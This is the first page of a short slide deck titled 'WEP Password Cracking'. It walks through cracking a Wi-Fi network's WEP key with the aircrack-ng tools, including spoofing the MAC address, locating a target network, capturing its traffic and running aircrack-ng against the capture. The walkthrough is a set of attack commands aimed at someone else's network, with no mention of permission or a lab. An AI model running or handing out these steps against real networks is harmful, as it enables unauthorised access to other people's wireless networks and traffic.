You are on page 1of 7

By

Shubham Gupta
shubham@wingfotech.com

WEP Password Cracking


Shared Key Authentication

• Shared Key Authentication uses a shared


secret such as the WEP key to authenticate
the client.
Working Illustration
Steps

• Bring the list of Wireless Network Interfaces


– airmon-ng
• Stop the wireless network to change our MAC
address
– airmon-ng stop
– ifconfig wlan0 down
• Change the MAC to something like:
– macchanger –mac 00:11:22:33:44:55 wlan0
• Now the MAC is done start again the wireless
services
– airmon-ng start wlan0
• Locate the available wireless networks
– airodump-ng mon0
• Now I hope a list of Networks appears. Once
we found our target stop the process: ^C
• Copy the MAC of the target and note the
Channel number
• Now we copy these details to a file
– airodump-ng –c [channel no.] –w [file name] –
bssid [target MAC] wlan0
• A window will appear leave this open
• Traffic feeding starts wait for sometime….
• Finally
• Aircrack-ng –b [Target MAC] [filename.cap]

You might also like